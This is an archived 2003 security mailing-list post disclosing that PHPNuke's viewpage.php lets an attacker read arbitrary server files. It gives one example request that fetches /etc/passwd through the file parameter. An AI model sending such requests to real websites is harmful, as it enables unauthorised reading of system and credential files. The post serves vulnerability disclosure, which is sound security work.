PHPNuke viewpage.php allows Remote File retrieving

From: Zero_X www.lobnan.de Team (zero-xat_private)
Date: Tue Mar 25 2003 - 08:32:07 PST

Next message: Auriemma Luigi: "Emule 0.27b remote crash"

Previous message: subj: "VChat"
Next in thread: Tibor Pittich: "Re: PHPNuke viewpage.php and another SQL injections"
Reply: Tibor Pittich: "Re: PHPNuke viewpage.php and another SQL injections"
Reply: DaiTengu: "Re: PHPNuke viewpage.php allows Remote File retrieving"
Reply: adminat_private: "Re: PHPNuke viewpage.php allows Remote File retrieving"
Reply: adminat_private: "Re: PHPNuke viewpage.php allows Remote File retrieving"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) viewpage.php is a part of PHPNuke. The Script allows an attacker to view all files on the System. Example: http://server.com/viewpage.php?file=/etc/passwd Zero X member of www.Lobnan.de

Next message: Auriemma Luigi: "Emule 0.27b remote crash"
Previous message: subj: "VChat"
Next in thread: Tibor Pittich: "Re: PHPNuke viewpage.php and another SQL injections"
Reply: Tibor Pittich: "Re: PHPNuke viewpage.php and another SQL injections"
Reply: DaiTengu: "Re: PHPNuke viewpage.php allows Remote File retrieving"
Reply: adminat_private: "Re: PHPNuke viewpage.php allows Remote File retrieving"
Reply: adminat_private: "Re: PHPNuke viewpage.php allows Remote File retrieving"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Mar 25 2003 - 09:47:59 PST